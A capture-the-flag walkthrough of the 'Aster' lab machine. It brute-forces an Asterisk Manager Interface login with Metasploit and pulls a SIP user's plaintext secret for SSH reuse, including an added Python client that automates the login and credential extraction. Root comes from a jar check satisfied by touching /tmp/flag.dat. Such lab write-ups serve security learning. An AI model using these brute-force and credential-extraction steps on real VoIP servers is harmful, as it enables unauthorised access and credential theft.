Aster
Introduction
Hack my server dedicated for building communications applications.
Enumeration
We always start by scanning the target IP for open ports with nmap.
The one that grabs attention is port 80 (Aster): the web page offers a file for download, and since it is practically begging us to do so 😀 we download it. It is a compiled Python file, so we cannot simply read it.
We first need to decompile it with uncompyle6:
pip3 install uncompyle6
pip installs the tool into ~/.local/bin, which is usually not on PATH, so we call it by its full path. On my machine:
/home/kali/.local/bin/uncompyle6 NAME_OF_THE_FILE > output.py
Running python3 output.py on its own won't tell us much. (If it throws a SyntaxError, it is because the decompiled code uses Python 2 print statements; wrap the arguments in parentheses, print(...), so that Python 3 accepts them.)
After fixing that and adding two extra print calls to dump the values the script works with, we get:
Now we know the username: admin. The output also hints that another service (the communications one) is running on the server on port 5038, which is the Asterisk Manager Interface (AMI); the admin username is what we will use against it.
Googling "Exploit Asterisk Call Manager 5.0.2" turns up how to attack this service's login with Metasploit.
Exploitation
USER.TXT
Let's start the Metasploit console and run the commands shown on that page (the module brute-forces the manager login for the given username):
sudo msfconsole
use auxiliary/voip/asterisk_login
show options
set username admin
set rhosts IP
set stop_on_success true
run
The module finds the password abc123, so we can connect to the manager interface with telnet:
telnet IP 5038
After the banner (Asterisk Call Manager/5.0.2) appears, we type the login action. AMI header names are case-insensitive, and every action has to be terminated by an empty line, so press Enter twice after the last header:
action:login
username:admin
secret:abc123
The server answers "Authentication accepted". Then we run a CLI command through the manager (again followed by an empty line):
action:command
command:sip show users
The Secret column of the sip show users output gives us another credential, harry:p4ss#w0rd!#, which we can use to SSH into the machine.
We SSH in with ssh harry@IP and enter the password. Then ls shows user.txt.
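The telnet session above is the whole AMI exchange by hand. The following script is an added example, not code from the original post: a minimal AMI client that does the same thing programmatically (connect, read the banner, Login, Command, Logoff) and then pulls the Username/Secret pairs out of the sip show users output. The wire-format details (CRLF-separated "Key: Value" headers ending in a blank line; Command replies either as "Response: Follows" text up to "--END COMMAND--" on older Asterisk or as "Output:" headers on newer ones) are taken from the AMI protocol, and the sample output embedded below is constructed to mirror the column layout of sip show users, so the parsing can be exercised offline.

```python
"""Minimal Asterisk Manager Interface (AMI) client for port 5038.

Added example (not from the original write-up). Assumes the standard AMI
wire format: packets are 'Key: Value' lines separated by CRLF and ended by
an empty line. A 'Command' reply is either 'Response: Follows' followed by
raw output up to '--END COMMAND--' (older Asterisk) or a normal packet with
one 'Output:' header per line (newer Asterisk); both are handled.
"""
import io
import socket

CRLF = "\r\n"
END_MARK = "--END COMMAND--"


def encode_action(action, **fields):
    """Serialise one AMI action; the trailing empty line tells the manager
    the action is complete (the 'press Enter twice' of the telnet session)."""
    lines = [f"Action: {action}"] + [f"{k}: {v}" for k, v in fields.items()]
    return (CRLF.join(lines) + CRLF + CRLF).encode()


def parse_packet(text):
    """Split one packet into (headers, output_lines). Header keys are
    lowercased; 'Output:' headers and raw lines of a 'Follows' reply are
    collected as output so both Command reply styles look the same."""
    headers, output = {}, []
    for line in text.split(CRLF):
        if not line or line == END_MARK:
            continue
        key, sep, value = line.partition(": ")
        if sep and " " not in key:
            if key.lower() == "output":
                output.append(value)
            else:
                headers[key.lower()] = value
        else:
            output.append(line)
    return headers, output


def _read_packet(f):
    """Read one packet from a line-oriented binary stream. A normal packet
    ends at the first empty line; a 'Follows' packet ends at END_MARK."""
    lines = []
    while True:
        raw = f.readline()
        if not raw:
            raise ConnectionError("AMI peer closed the connection")
        line = raw.decode(errors="replace").rstrip("\r\n")
        follows = lines[:1] == ["Response: Follows"]
        if line == END_MARK:
            f.readline()  # consume the empty line after the end marker
            break
        if not line and not follows:
            break
        lines.append(line)
    return CRLF.join(lines)


def read_packet_from_bytes(data):
    """Offline helper: run the packet reader over an in-memory stream."""
    return _read_packet(io.BytesIO(data))


def ami_command(host, port, username, secret, command, timeout=10):
    """Log in, run one CLI command, log off. Returns (banner, output_lines);
    raises PermissionError if the manager rejects the credentials."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        f = sock.makefile("rwb")
        # The banner ('Asterisk Call Manager/5.0.2') is a single line, not a packet.
        banner = f.readline().decode(errors="replace").strip()
        f.write(encode_action("Login", Username=username, Secret=secret))
        f.flush()
        login, _ = parse_packet(_read_packet(f))
        if login.get("response") != "Success":
            raise PermissionError(f"{banner}: {login.get('message', 'login rejected')}")
        f.write(encode_action("Command", Command=command))
        f.flush()
        _, output = parse_packet(_read_packet(f))
        f.write(encode_action("Logoff"))
        f.flush()
        return banner, output


def sip_users_credentials(output_lines):
    """Extract (username, secret) pairs from 'sip show users' output using
    the header's column offsets, so an empty Secret column cannot shift the
    fields the way whitespace splitting would."""
    header = next((l for l in output_lines if l.startswith("Username")), None)
    if header is None:
        return []
    secret_col, account_col = header.index("Secret"), header.index("Accountcode")
    creds = []
    for line in output_lines[output_lines.index(header) + 1:]:
        user = line[:secret_col].strip()
        if user:
            creds.append((user, line[secret_col:account_col].strip()))
    return creds


# Constructed sample of an older-style Command reply, laid out like the
# real 'sip show users' table (fixed-width columns).
SAMPLE_SIP_SHOW_USERS = CRLF.join([
    "Response: Follows",
    "Privilege: Command",
    f"{'Username':<27}{'Secret':<17}{'Accountcode':<17}{'Def.Context':<17}ACL  Forcerport",
    f"{'harry':<27}{'p4ss#w0rd!#':<17}{'':<17}{'default':<17}No   Yes",
    END_MARK,
])

if __name__ == "__main__":
    _, out = parse_packet(SAMPLE_SIP_SHOW_USERS)
    print(sip_users_credentials(out))
    # Live use against the box: ami_command("IP", 5038, "admin", "abc123", "sip show users")
```

Against the real target, ami_command("IP", 5038, "admin", "abc123", "sip show users") returns the banner and the same table the telnet session printed; feed its output to sip_users_credentials to get harry's secret.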
ROOT.TXT
Most probably, the way to escalate to root is through the interesting file Example_Root.jar. To run a jar file we use the following command:
java -jar Example_Root.jar
However, it throws an error message.
We will copy the file to our Kali machine to decompile it and read the source code.
On the target machine (as harry), in the directory that holds the jar, we start an HTTP server on port 8000:
python3 -m http.server 8000
On our Kali machine we download the file with wget:
wget http://<HOST_IP>:8000/Example_Root.jar
Now we decompile it with a Java decompiler.
After reading the code a bit, we can see it returns true only if a file named flag.dat exists under /tmp.
We go back to the target machine and create that file:
touch /tmp/flag.dat
Now we rerun the jar (the command name is lowercase java; the shell is case-sensitive):
java -jar Example_Root.jar
Then we do:
ls
And we get root.txt!